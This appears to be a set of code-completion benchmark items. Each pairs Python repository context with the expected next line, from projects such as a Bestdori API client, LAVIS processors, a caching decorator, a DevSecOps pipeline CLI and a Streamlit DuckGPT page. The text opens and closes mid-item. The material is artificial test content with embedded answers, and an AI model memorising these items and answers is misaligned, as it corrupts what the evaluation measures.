from ...ml_decoder.ml_decoder import add_ml_decoder_head
from ..tresnet import TResnetM, TResnetL, TResnetXL
from ..vit import VE
logger = logging.getLogger(__name__)
def create_model(args,load_head=False):
"""Create a model
"""
model_params = {'args': args, 'num_classes': args.num_classes, 'image_size': args.image_size}
args = model_params['args']
args.model_name = args.model_name.lower()
if args.model_name == 'vit':
model = VE(model_params)
elif args.model_name == 'tresnet_m':
model = TResnetM(model_params)
elif args.model_name == 'tresnet_l':
| model = TResnetL(model_params) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: WindowsSov8forUs/bestdori_api
# Path: bestdori/exceptions.py
class AssetsNotExistError(AssetsException):
'''资源不存在'''
# 初始化
def __init__(self, asset_name: str) -> None:
msg = f'资源 {asset_name} 可能不存在。'
super().__init__(msg)
# Path: bestdori/exceptions.py
class RequestException(BaseException):
'''请求发送错误'''
# 初始化
def __init__(self, api: str, msg: str='无错误代码获取。', **kwargs: Any) -> None:
if len(kwargs) > 0:
msg += f': {kwargs}'
else:
msg += '。'
super().__init__(msg)
self.api = api
'''请求所使用的 API'''
# 字符串化
def __str__(self) -> str:
'''输出字符串'''
return f'向 Bestdori {self.api} 发送请求时出错。{self.message}'
# Path: bestdori/exceptions.py
REQUEST_EXCEPTION: dict[str, type[RequestException]] = {
'REQUEST_INVALID': RequestInvalidError,
'LOGIN_REQUIRED': LoginRequiredError,
'CREDENTIALS_INVALID': CredentialsInvalidError,
'USER_INVALID': UserInvalidError,
'ALREADY_UPLOADED': AlreadyUploadedError,
'POST_INVALID': PostInvalidError
}
# Path: bestdori/utils/network.py
from json import dumps
from io import BufferedReader
from httpx._models import Cookies
from httpx import Response, Request, Client
from typing import Optional, Literal, cast, Any
from ..exceptions import (
AssetsNotExistError,
RequestException,
REQUEST_EXCEPTION
)
'''`bestdori.utils.network`
向 Bestdori 发送请求相关模块'''
# 向 Bestdori 发送 API 请求类
class Api:
'''向 Bestdori 发送 API 请求类
参数:
api (str): 请求的 API 地址
proxy (Optional[str]): 代理服务器'''
api: str
'''请求的 API 地址'''
proxy: Optional[str]=None
'''代理服务器'''
headers: dict[str, str]
'''请求头'''
# 初始化
def __init__(
self,
api: str,
proxy: Optional[str]=None
) -> None:
'''初始化'''
self.api = api
self.proxy = proxy
self.headers = {'Content-Type': 'application/json;charset=UTF-8'}
return
# 请求发送
def request(
self,
method: Literal['get', 'post'],
*,
cookies: Optional[Cookies]=None,
params: Optional[dict[str, Any]]=None,
data: Optional[dict[str, Any]]=None,
files: Optional[dict[str, tuple[str, BufferedReader]]]=None
) -> Response:
'''请求发送
参数:
method (Literal['get', 'post']): API 调用方法
cookies (Optional[Cookies], optional): Cookies
params (Optional[dict[str, Any]], optional): 调用参数
data (Optional[dict[str, Any]], optional): 调用参数,将以 `json` 字符串形式发送
files (Optional[dict[str, tuple[str, BufferedReader]]], optional): 发送文件参数
返回:
Response: 收到的响应
'''
# 处理接收到的 API
if self.api.startswith('http://') or self.api.startswith('https://'):
self.api = self.api
else:
self.api = 'https://bestdori.com/api/' + self.api
# 构建一个请求体
request = Request(
method,
self.api,
cookies=cookies,
params=params,
data=cast(dict, dumps(data)) if data is not None else data,
files=files,
headers=self.headers if not self.api.endswith('/upload') else None
)
# 构建代理服务器字典
if self.proxy is not None:
proxies = {'http://': self.proxy, 'https://': self.proxy}
else:
proxies = None
# 发送请求并获取响应
with Client(proxies=cast(dict, proxies)) as client:
response = client.send(request)
client.close()
# 处理接收到的响应
response.raise_for_status()
# 判断接收到的响应是否为 json 格式
if 'application/json' not in (content_type := response.headers.get('content-type', None)):
if content_type is not None:
return response
else:
raise Exception('接收到的响应没有 content-type。')
if isinstance((response_data := response.json()), dict):
if (result := response_data.get('result', None)) is not None:
if result is False:
if (code := response_data.get('code', None)) is not None:
if code in REQUEST_EXCEPTION.keys(): # 若错误码已被记录
exception_class = REQUEST_EXCEPTION[code]
if params is not None:
raise exception_class(self.api, **params)
elif data is not None:
raise exception_class(self.api, **data)
else:
raise exception_class(self.api)
else:
| raise RequestException(self.api, code) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: jidiai/Competition_OvercookedAI-2
# Path: env/chooseenv.py
def make(env_type, seed=None, conf=None):
file_path = os.path.join(os.path.dirname(__file__), 'config.json')
if not conf:
with open(file_path) as f:
conf = json.load(f)[env_type]
class_literal = conf['class_literal']
if env_type.split('-')[0] in ["olympics"]:
return getattr(env, class_literal)(conf, seed)
else:
return getattr(env, class_literal)(conf)
# Path: utils/get_logger.py
def get_logger(log_path, name, save_file=False, console_out=False, json_file=False):
if not os.path.exists(log_path):
os.mkdir(log_path)
logger = logging.getLogger(name='Jidi')
logger.setLevel(logging.INFO)
# 每分钟建一个文件
rq = time.strftime('%Y%m%d%H%M', time.localtime(time.time()))
log_name = log_path + rq + '_' + name+ '.log'
json_log_name = log_path + rq + '_' + name + '.json'
logfile = log_name
if save_file:
fh = logging.FileHandler(logfile, mode='a')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(message)s")
fh.setFormatter(formatter)
logger.addHandler(fh)
# 输出到控制台
if console_out:
console = logging.StreamHandler()
console.setLevel(logging.INFO)
logger.addHandler(console)
# 输出到json
if json_file:
fh_json = logging.FileHandler(json_log_name, mode='a')
fh_json.setLevel(logging.DEBUG)
formatter_json = logging.Formatter("%(message)s")
fh_json.setFormatter(formatter_json)
logger.addHandler(fh_json)
return logger
# Path: env/obs_interfaces/observation.py
class GridObservation(object):
class VectorObservation(object):
class DictObservation(object):
class CustomObservation(object):
def get_grid_observation(self, current_state, player_id, info_before):
def get_grid_many_observation(self, current_state, player_id_list, info_before=''):
def get_vector_observation(self, current_state, player_id, info_before):
def get_vector_many_observation(self, current_state, player_id_list, info_before=''):
def get_dict_observation(self, current_state, player_id, info_before):
def get_dict_many_observation(self, current_state, player_id_list, info_before=''):
def get_custom_observation(self, current_state, player_id):
def get_custom_obs_space(self, player_id):
def get_custom_many_observation(self, current_state, player_id_list):
def get_custom_many_obs_space(self, player_id_list):
# Path: run_log.py
import os
import time
import json
import numpy as np
import argparse
import sys
from env.chooseenv import make
from utils.get_logger import get_logger
from env.obs_interfaces.observation import obs_type
# -*- coding:utf-8 -*-
sys.path.append("./olympics_engine")
class NpEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.integer):
return int(obj)
elif isinstance(obj, np.floating):
return float(obj)
elif isinstance(obj, np.ndarray):
return obj.tolist()
else:
return super(NpEncoder, self).default(obj)
def get_players_and_action_space_list(g):
if sum(g.agent_nums) != g.n_player:
raise Exception("agent number = %d 不正确,与n_player = %d 不匹配" % (sum(g.agent_nums), g.n_player))
n_agent_num = list(g.agent_nums)
for i in range(1, len(n_agent_num)):
n_agent_num[i] += n_agent_num[i - 1]
# 根据agent number 分配 player id
players_id = []
actions_space = []
for policy_i in range(len(g.obs_type)):
if policy_i == 0:
players_id_list = range(n_agent_num[policy_i])
else:
players_id_list = range(n_agent_num[policy_i - 1], n_agent_num[policy_i])
players_id.append(players_id_list)
action_space_list = [g.get_single_action_space(player_id) for player_id in players_id_list]
actions_space.append(action_space_list)
return players_id, actions_space
def get_joint_action_eval(game, multi_part_agent_ids, policy_list, actions_spaces, all_observes):
if len(policy_list) != len(game.agent_nums):
error = "模型个数%d与玩家个数%d维度不正确!" % (len(policy_list), len(game.agent_nums))
raise Exception(error)
# [[[0, 0, 0, 1]], [[0, 1, 0, 0]]]
joint_action = []
for policy_i in range(len(policy_list)):
if game.obs_type[policy_i] not in obs_type:
raise Exception("可选obs类型:%s" % str(obs_type))
agents_id_list = multi_part_agent_ids[policy_i]
action_space_list = actions_spaces[policy_i]
function_name = 'm%d' % policy_i
for i in range(len(agents_id_list)):
agent_id = agents_id_list[i]
a_obs = all_observes[agent_id]
each = eval(function_name)(a_obs, action_space_list[i], game.is_act_continuous)
joint_action.append(each)
# print(joint_action)
return joint_action
def set_seed(g, env_name):
if env_name.split("-")[0] in ['magent']:
g.reset()
seed = g.create_seed()
g.set_seed(seed)
def run_game(g, env_name, multi_part_agent_ids, actions_spaces, policy_list, render_mode):
"""
This function is used to generate log for Vue rendering. Saves .json file
"""
log_path = os.getcwd() + '/logs/'
if not os.path.exists(log_path):
os.mkdir(log_path)
| logger = get_logger(log_path, g.game_name, json_file=render_mode) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: AnonymGiant/ViLaM
# Path: lavis/common/registry.py
class Registry:
def register_builder(cls, name):
def wrap(builder_cls):
def register_task(cls, name):
def wrap(task_cls):
def register_model(cls, name):
def wrap(model_cls):
def register_processor(cls, name):
def wrap(processor_cls):
def register_lr_scheduler(cls, name):
def wrap(lr_sched_cls):
def register_runner(cls, name):
def wrap(runner_cls):
def register_path(cls, name, path):
def register(cls, name, obj):
def get_builder_class(cls, name):
def get_model_class(cls, name):
def get_task_class(cls, name):
def get_processor_class(cls, name):
def get_lr_scheduler_class(cls, name):
def get_runner_class(cls, name):
def list_runners(cls):
def list_models(cls):
def list_tasks(cls):
def list_processors(cls):
def list_lr_schedulers(cls):
def list_datasets(cls):
def get_path(cls, name):
def get(cls, name, default=None, no_warning=False):
def unregister(cls, name):
# Path: lavis/processors/base_processor.py
class BaseProcessor:
def __init__(self):
self.transform = lambda x: x
return
def __call__(self, item):
return self.transform(item)
@classmethod
def from_config(cls, cfg=None):
return cls()
def build(self, **kwargs):
cfg = OmegaConf.create(kwargs)
return self.from_config(cfg)
# Path: lavis/processors/randaugment.py
class RandomAugment(object):
def __init__(self, N=2, M=10, isPIL=False, augs=[]):
self.N = N
self.M = M
self.isPIL = isPIL
if augs:
self.augs = augs
else:
self.augs = list(arg_dict.keys())
def get_random_ops(self):
sampled_ops = np.random.choice(self.augs, self.N)
return [(op, 0.5, self.M) for op in sampled_ops]
def __call__(self, img):
if self.isPIL:
img = np.array(img)
ops = self.get_random_ops()
for name, prob, level in ops:
if np.random.random() > prob:
continue
args = arg_dict[name](level)
img = func_dict[name](img, *args)
return img
# Path: lavis/processors/blip_processors.py
import re
from lavis.common.registry import registry
from lavis.processors.base_processor import BaseProcessor
from lavis.processors.randaugment import RandomAugment
from omegaconf import OmegaConf
from torchvision import transforms
from torchvision.transforms.functional import InterpolationMode
"""
Copyright (c) 2022, salesforce.com, inc.
All rights reserved.
SPDX-License-Identifier: BSD-3-Clause
For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
"""
class BlipImageBaseProcessor(BaseProcessor):
def __init__(self, mean=None, std=None):
if mean is None:
mean = (0.48145466, 0.4578275, 0.40821073)
if std is None:
std = (0.26862954, 0.26130258, 0.27577711)
self.normalize = transforms.Normalize(mean, std)
| @registry.register_processor("blip_caption") |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: MorrisNein/pecapiku
# Path: pecapiku/base_cache.py
class omnimethod(Generic[DecoratedCallable]):
class BaseCache(ABC):
def __init__(self, func: DecoratedCallable):
def __get__(self, instance, owner) -> DecoratedCallable:
def __init__(self, file_path: os.PathLike | str | None = None, access: CacheAccess = 'rew'):
def _get_cache_val(self, key: Hashable) -> Any:
def _put_cache_val(self, key: Hashable, value: Any):
def _key_func(self, *args, **kwargs) -> Hashable:
def _read_execute_write(self, func, func_args, func_kwargs, access, key_kwargs: dict | None = None) -> Any:
def _decorate(cls, func: DecoratedCallable, *args, **kwargs) -> Decorator | DecoratedCallable:
def _get_default_file_path(cls):
def decorate(self: BaseCache | Type[BaseCache],
func: DecoratedCallable,
*,
file_path: os.PathLike | str | None = None,
access: CacheAccess | None = None, **kwargs) -> Decorator | DecoratedCallable:
# Path: pecapiku/cache_access.py
COMP_CACHE_FILE_NAME = '_comp_cache.pkl'
def _resolve_filepath(file_path: os.PathLike | str) -> Path:
def _initialize_cache(file_path: os.PathLike) -> NoCache | Any:
def update_cache(cache: Any, file_path: Path):
# Path: pecapiku/no_cache.py
class NoCache:
def __bool__(self):
return False
def __eq__(self, other) -> bool:
return isinstance(other, NoCache)
def __repr__(self):
return '<NoCache object>'
# Path: pecapiku/single_value_cache.py
import os
from functools import partial, wraps
from typing import Any, Generic, Hashable
from pecapiku.base_cache import BaseCache, DecoratedCallable, Decorator, omnimethod
from pecapiku.cache_access import CacheAccess, _initialize_cache, _resolve_filepath, update_cache
from pecapiku.no_cache import NoCache
from __future__ import annotations
class SingleValueCache(BaseCache, Generic[DecoratedCallable]):
""" Decorator for caching of evaluation results.
Creates a "pickle" file at disk space on a specified path.
Wraps a function and stores its execution result in the file.
To apply, use the method ``SingleValueCache.decorate()`` or ``SingleValueCache(...)()``.
Args:
file_path - a path to an existing or non-existent pickle file.
If a relative path or a filename is given, puts it into the framework cache directory.
access - cache access indicators. The string may include the following indicators:
- ``r`` - read - grants access to read the cache file content
- ``e`` - execute/evaluate - grants access to evaluate the decorated function (if such is present)
- ``w`` - write - grants access to modify the cache file content
Example
-------
>>> import time
>>> from timeit import timeit
>>> def a_heavy_function():
... time.sleep(1)
...
... @SingleValueCache('a_heavy_function.pkl') # or @SingleValueCache.decorate(file_path='a_heavy_function.pkl')
>>> def a_heavy_function_cached():
... time.sleep(1)
>>> print(timeit(a_heavy_function, number=10)) # 10.070
>>> print(timeit(a_heavy_function_cached, number=10)) # 1.015
"""
@classmethod
def _get_default_file_path(cls) -> None:
return None
def __init__(self, file_path: os.PathLike | str | None = None, access: CacheAccess = 'rew'):
super().__init__(file_path, access)
self.cache_dict = None
def __call__(self,
func: DecoratedCallable | None = None, *, file_path: os.PathLike | str | None = None,
| access: CacheAccess | None = None) -> DecoratedCallable | Decorator: |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: gerlaxrex/parrot
# Path: parrot1/utils/file_utils.py
def get_extension(filename: Union[str, os.PathLike]) -> str:
return os.path.basename(filename).rsplit(".", 1)[1]
# Path: parrot1/audio/utils/silence.py
def split_on_silence(
segment: pydub.AudioSegment,
min_silence_len: int = 1000,
silence_thresh: int = -16,
padding: int | bool = 100,
seek_step: int = 1,
) -> tuple[list[pydub.AudioSegment], list[tuple[float, float]]]:
"""It splits an audio segment on silent sections
Parameters
----------
segment
The original audio segment
min_silence_len
The minimum length of silence in millis for a split
silence_thresh
The silence threshold in dBFS
padding
The amount of silence chunks should be padded with
It keeps the audio segment from sounding like it is abruptly cut off
seek_step
The step size in millis for iterating over the segment
Returns
-------
The audio chunks and split ranges in millis
"""
T = len(segment)
if isinstance(padding, bool):
padding = T if padding else 0
R = deque(detect_nonsilent(segment, min_silence_len, silence_thresh, seek_step))
Q = []
while R:
x = R.popleft()
s = max(x[0] - padding, 0)
e = min(x[1] + padding, T)
x = (s, e)
# It merges overlapping padding
if Q and s < Q[-1][1]:
s = Q[-1][0]
e = max(Q[-1][1], e)
Q[-1] = (s, e)
continue
Q.append(x)
return [segment[s:e] for s, e in Q], Q
# Path: parrot1/audio/extraction/audio_extraction.py
import logging
import os
from typing import List, Union
from pydub import AudioSegment
from tqdm import tqdm
from parrot1.utils.file_utils import get_extension
from parrot1.audio.utils.silence import split_on_silence
__logger = logging.getLogger(__name__)
def get_audio_from_video(video_filename: Union[str, os.PathLike]) -> AudioSegment:
"""
Takes the audio from the video file
:param video_filename: (Union[str, os.PathLike]) path to the video
:return: (io.BytesIO) Audio bytes
"""
if not os.path.exists(video_filename):
raise FileNotFoundError(f"File at {video_filename} does not exists.")
| audio = AudioSegment.from_file(video_filename, format=get_extension(video_filename)) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: chenaoxuan/UsfUtils
# Path: usfutils/dist.py
def master_only(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
rank, _ = get_dist_info()
if rank == 0:
return func(*args, **kwargs)
return wrapper
# Path: usfutils/time.py
def get_time_asc() -> str:
"""
e.g. 'Sat Jun 06 16:26:11 1998'.
:return:
"""
return time.asctime()
# Path: usfutils/dict.py
class UsfDict(dict):
def __init__(self, d: dict = None, **kwards):
super().__init__()
if d is None:
d = {}
else:
d.update(**kwards)
for k, v in d.items():
setattr(self, k, v)
# Class attributes
for k in self.__class__.__dict__.keys():
if not (k.startswith('__') and k.endswith('__')) and not k in ('update', 'pop'):
setattr(self, k, getattr(self, k))
def __setattr__(self, name, value):
if isinstance(value, (list, tuple)):
value = [self.__class__(x)
if isinstance(x, dict) else x for x in value]
elif isinstance(value, dict) and not isinstance(value, UsfDict):
value = UsfDict(value)
super(UsfDict, self).__setitem__(name, value)
__setitem__ = __setattr__
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
def update(self, e: Union['UsfDict', dict, argparse.Namespace] = None, verbose=True, **kwargs):
d = e or dict()
if isinstance(d, argparse.Namespace):
d = vars(d)
d.update(kwargs)
output_msg = []
for k in d:
v = self.get(k, None)
if v is not None and (not isinstance(type(v), type(d[k])) or v != d[k]):
output_msg.append(str(k))
setattr(self, k, d[k])
if verbose and len(output_msg):
print(f"{output_msg} in UsfDict has been modified!")
def pop(self, k, d=None):
delattr(self, k)
return super(UsfDict, self).pop(k, d)
# Path: usfutils/config.py
import io
import os
import sys
import yaml
from shutil import copyfile
from typing import Union
from .dist import master_only
from .time import get_time_asc
from .dict import UsfDict
__all__ = [
'load_yaml',
'dict_to_yaml',
'copy_opt_file'
]
| def load_yaml(path: str) -> UsfDict: |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: ErdemOzgen/DevSecOpsBuilder
# Path: devsecopsbuilder/pipeline_executer.py
def load_configuration(filepath):
def create_output_directory(directory):
def install_tools(tools):
def update_tools(tools):
def run_command(step, output_dir, **kwargs):
def execute_post_command(step, **kwargs):
def get_output_file_path(output_dir, step_name):
def execute_command(command):
def save_command_output(result, output_file, step_name, command):
def get_repository_languages(repository_path):
def main():
# Path: devsecopsbuilder/convert_graph.py
def create_workflow_graph(steps):
def parse_yaml_and_create_graph(file_path):
G = nx.DiGraph()
# Path: devsecopsbuilder/convert_pipeline.py
def generate_jenkinsfile(yaml_path, jenkinsfile_path):
def write_step(jfile, step):
# Path: devsecopsbuilder/generate_report.py
def get_file_path(base_dir, scan_type, file_name):
def process_json_data(file_path, heading_title, item_processor, data_tag, addHeader=True, giveInfo=True): # noqa: E501
def bandit_item_processor(item):
def grype_item_processor(item):
def safety_item_processor(item):
def secret_item_processor(result):
def sbom_item_processor(component):
def bandit_results(bandit_file_path):
def grype_results(grype_file_path):
def safety_info(safety_file_path):
def safety_scanned_packages(item):
def safety_results(safety_file_path):
def secret_results(secret_file_path):
def process_secrets(item):
def sbom_results(sbom_file_path):
def generate_pdf(output_filename, **scan_files): # noqa: E501
def find_file_by_keyword(base_dir, scan_type, keyword):
def find_and_generate_report(base_dir, scan_type, output_filename):
# Path: devsecopsbuilder/asciiart.py
def print_ascii_art():
# Path: main.py
import argparse
import networkx as nx
import matplotlib.pyplot as plt
from devsecopsbuilder import pipeline_executer
from devsecopsbuilder import convert_graph
from devsecopsbuilder import convert_pipeline
from devsecopsbuilder import generate_report # noqa: F401
from devsecopsbuilder import asciiart
def main():
parser = argparse.ArgumentParser(description="Pipeline Execution Script")
parser.add_argument("--install", action="store_true", help="Install tools")
parser.add_argument("--update", action="store_true", help="Update tools")
parser.add_argument(
"--execute", action="store_true", help="Execute commands from playbook"
)
parser.add_argument(
"--config",
default="./playbooks/playbook.yaml",
help="Path to configuration file (optional)",
)
parser.add_argument(
"--output_dir",
default="command_outputs/outputs",
help="Path to output directory (optional)",
)
parser.add_argument(
"--tools_config",
default="./tools/tools.yaml",
help="Path to tools configuration file (optional)",
)
parser.add_argument(
"--report",
action="store_true",
help="Generates a report of the results of playbooks",
)
parser.add_argument(
"--generate_graph",
action="store_true",
help="Generate graph of defined yaml workflow",
)
parser.add_argument(
"--graph_yaml",
default="./playbooks/playbook.yaml",
help="Path to yaml file for generating graph (optional)",
)
parser.add_argument(
"--graph_output_dir",
default="command_outputs/graphs/graph.png",
help="Path to graph output directory (optional)",
)
parser.add_argument(
"--convert_pipeline", action="store_true", help="Convert yaml to pipeline" # noqa: E501
)
parser.add_argument(
"--pipeline_yaml",
default="./playbooks/playbook.yaml",
help="Path to workflow yaml file to pipeline (optional)",
)
parser.add_argument(
"--pipeline_output_dir",
default="command_outputs/jenkinsFiles/Jenkinsfile",
help="Path to pipeline output directory (optional)",
)
args = parser.parse_args()
# Check if no actionable arguments were provided
actionable_args = [
args.install,
args.update,
args.execute,
args.report,
args.generate_graph,
args.convert_pipeline,
]
if not any(actionable_args):
asciiart.print_ascii_art()
parser.print_help()
return
# Load configuration from specified or default path
config = pipeline_executer.load_configuration(args.config)
# Create specified or default output directory
pipeline_executer.create_output_directory(args.output_dir)
# Define default paths and other variables as a dictionary
default_variables = {
# Default variable values go here
}
if args.install or args.update:
# Load tool configuration from the YAML file
tools_config = pipeline_executer.load_configuration(args.tools_config)
all_tools = tools_config["tools_to_install"]["tools"]
default_tools = [tool for tool in all_tools if tool.get("default", False)] # noqa: E501
# Assuming 'tools' is the relevant section in the configuration for install/update # noqa: E501
# tools = config.get("tools", [])
if args.install:
# Install tools
pipeline_executer.install_tools(default_tools)
elif args.update:
# Update tools
pipeline_executer.update_tools(default_tools)
if args.execute:
# Execute configured commands
commands_to_run = config.get("commands_to_run", {}).get("steps", [])
for step in commands_to_run:
if isinstance(step, dict):
# Update default variables with step-specific ones if they exist # noqa: E501
step_variables = {**default_variables, **step.get("parameters", {})} # noqa: E501
pipeline_executer.run_command(step, args.output_dir, **step_variables) # noqa: E501
else:
print(f"Invalid step format: {step}")
if args.generate_graph:
try:
| workflow_graph = convert_graph.parse_yaml_and_create_graph(args.graph_yaml) # noqa: E501 |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: doodledood/chat-flock
# Path: chatflock/base.py
class ActiveChatParticipant(ChatParticipant):
symbol: str
messages_hidden: bool = False
def __init__(self, name: str, symbol: str = "👤", messages_hidden: bool = False):
super().__init__(name=name)
self.symbol = symbol
self.messages_hidden = messages_hidden
@abc.abstractmethod
def respond_to_chat(self, chat: "Chat") -> str:
raise NotImplementedError()
def __str__(self) -> str:
return f"{self.symbol} {self.name}"
def detailed_str(self, level: int = 0) -> str:
prefix = " " * level
return f"{prefix}- Name: {self.name}\n{prefix} Symbol: {self.symbol}"
# Path: chatflock/base.py
class Chat:
backing_store: ChatDataBackingStore
renderer: ChatRenderer
name: Optional[str] = None
max_total_messages: Optional[int] = None
hide_messages: bool = False
def __init__(
self,
backing_store: ChatDataBackingStore,
renderer: ChatRenderer,
initial_participants: Optional[Sequence[ChatParticipant]] = None,
name: Optional[str] = None,
max_total_messages: Optional[int] = None,
hide_messages: bool = False,
):
if max_total_messages is not None and max_total_messages <= 0:
raise ValueError("Max total messages must be None or greater than 0.")
self.backing_store = backing_store
self.renderer = renderer
self.name = name
self.hide_messages = hide_messages
self.max_total_messages = max_total_messages
for i, participant in enumerate(initial_participants or []):
self.add_participant(participant)
def add_participant(self, participant: ChatParticipant) -> None:
if self.has_active_participant_with_name(participant.name) or self.has_non_active_participant_with_name(
participant.name
):
raise ChatParticipantAlreadyJoinedToChatError(participant.name)
self.backing_store.add_participant(participant)
all_participants = (
self.backing_store.get_active_participants() + self.backing_store.get_non_active_participants()
)
for participant in all_participants:
participant.on_participant_joined_chat(chat=self, participant=participant)
def remove_participant(self, participant: ChatParticipant) -> None:
self.backing_store.remove_participant(participant)
active_participants = self.backing_store.get_active_participants()
non_active_participants = self.backing_store.get_non_active_participants()
all_participants = active_participants + non_active_participants
for participant in all_participants:
participant.on_participant_left_chat(chat=self, participant=participant)
def add_message(self, sender_name: str, content: str) -> None:
sender = self.backing_store.get_active_participant_by_name(sender_name)
if sender is None:
raise ChatParticipantNotJoinedToChatError(sender_name)
message = self.backing_store.add_message(sender_name=sender_name, content=content)
self.renderer.render_new_chat_message(chat=self, message=message)
active_participants = self.backing_store.get_active_participants()
non_active_participants = self.backing_store.get_non_active_participants()
all_participants = active_participants + non_active_participants
for participant in all_participants:
participant.on_new_chat_message(chat=self, message=message)
def get_messages(self) -> List[ChatMessage]:
return self.backing_store.get_messages()
def clear_messages(self):
self.backing_store.clear_messages()
def get_active_participants(self) -> List[ActiveChatParticipant]:
return self.backing_store.get_active_participants()
def get_non_active_participants(self) -> List[ChatParticipant]:
return self.backing_store.get_non_active_participants()
def get_active_participant_by_name(self, name: str) -> Optional[ActiveChatParticipant]:
return self.backing_store.get_active_participant_by_name(name=name)
def get_non_active_participant_by_name(self, name: str) -> Optional[ChatParticipant]:
return self.backing_store.get_non_active_participant_by_name(name=name)
def has_active_participant_with_name(self, participant_name: str) -> bool:
return self.backing_store.has_active_participant_with_name(participant_name=participant_name)
def has_non_active_participant_with_name(self, participant_name: str) -> bool:
return self.backing_store.has_non_active_participant_with_name(participant_name=participant_name)
@property
def active_participants_str(self):
return "\n\n".join([participant.detailed_str() for participant in self.get_active_participants()])
# Path: chatflock/participants/user.py
from typing import Any
from chatflock.base import ActiveChatParticipant, Chat
class UserChatParticipant(ActiveChatParticipant):
def __init__(self, name: str = "User", role: str = "User", symbol: str = "👤", **kwargs: Any):
super().__init__(name, messages_hidden=True, **kwargs)
self.role = role
self.symbol = symbol
| def respond_to_chat(self, chat: Chat) -> str: |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: phidatahq/junior-de
# Path: app/openai_key.py
def get_openai_key() -> Optional[str]:
"""Sidebar component to get OpenAI API key"""
# Get OpenAI API key from environment variable
openai_key: Optional[str] = getenv("OPENAI_API_KEY")
# If not found, get it from user input
if openai_key is None or openai_key == "" or openai_key == "sk-***":
api_key = st.sidebar.text_input("OpenAI API key", placeholder="sk-***", key="api_key")
if api_key != "sk-***" or api_key != "" or api_key is not None:
openai_key = api_key
# Store it in session state and environment variable
if openai_key is not None and openai_key != "":
st.session_state["OPENAI_API_KEY"] = openai_key
environ["OPENAI_API_KEY"] = openai_key
return openai_key
# Path: app/password.py
def check_password() -> bool:
"""Component to checks if a password entered by the user is correct.
To use this component, set the environment variable `APP_PASSWORD`.
Returns:
bool: `True` if the user had the correct password.
"""
app_password = getenv("APP_PASSWORD")
if app_password is None:
return True
def check_first_run_password():
"""Checks whether a password entered on the first run is correct."""
if "first_run_password" in st.session_state:
password_to_check = st.session_state["first_run_password"]
if password_to_check == app_password:
st.session_state["password_correct"] = True
# don't store password
del st.session_state["first_run_password"]
else:
st.session_state["password_correct"] = False
def check_updated_password():
"""Checks whether an updated password is correct."""
if "updated_password" in st.session_state:
password_to_check = st.session_state["updated_password"]
if password_to_check == app_password:
st.session_state["password_correct"] = True
# don't store password
del st.session_state["updated_password"]
else:
st.session_state["password_correct"] = False
# First run, show input for password.
if "password_correct" not in st.session_state:
st.text_input(
"Password",
type="password",
on_change=check_first_run_password,
key="first_run_password",
)
return False
# Password incorrect, show input for updated password + error.
elif not st.session_state["password_correct"]:
st.text_input(
"Password",
type="password",
on_change=check_updated_password,
key="updated_password",
)
st.error("😕 Password incorrect")
return False
# Password correct.
else:
return True
# Path: app/reload.py
def reload_button():
"""Sidebar component to show reload button"""
st.sidebar.markdown("---")
if st.sidebar.button("Reload Session"):
st.session_state.clear()
st.rerun()
# Path: app/user_name.py
def get_user_name() -> Optional[str]:
"""Sidebar component to get username"""
# Get user_name from user if not in session state
if "user_name" not in st.session_state:
username_input_container = st.sidebar.empty()
username = username_input_container.text_input(":technologist: Enter username")
if username != "":
st.session_state["user_name"] = username
username_input_container.empty()
# Get user_name from session state
user_name = st.session_state.get("user_name")
return user_name
# Path: duckgpt/s3_tables.py
def load_s3_tables(duckdb_tools: DuckDbTools) -> None:
"""Load S3 tables to DuckDB"""
for table in s3_tables:
duckdb_tools.create_table_from_path(path=table.path, table=table.name)
logger.info(f"Created table: {table.name}")
# Path: llm/conversations/duckgpt_s3.py
def get_duckgpt_s3_conversation(
user_name: Optional[str] = None,
conversation_id: Optional[str] = None,
debug_mode: bool = False,
) -> Conversation:
# Path: utils/log.py
def build_logger(logger_name: str) -> logging.Logger:
# Path: app/pages/3_DuckGPT_S3.py
from typing import List
from phi.conversation import Conversation
from app.openai_key import get_openai_key
from app.password import check_password
from app.reload import reload_button
from app.user_name import get_user_name
from duckgpt.s3_tables import load_s3_tables
from llm.conversations.duckgpt_s3 import duckdb_s3_tools, get_duckgpt_s3_conversation
from utils.log import logger
import streamlit as st
st.title(":snowman: DuckGPT")
st.markdown('<a href="https://github.com/phidatahq/phidata"><h4>by phidata</h4></a>', unsafe_allow_html=True)
def restart_conversation():
st.session_state["s3_conversation"] = None
st.session_state["s3_conversation_id"] = None
st.rerun()
def main() -> None:
# Get users OpenAI API key
get_openai_key()
# Get user name
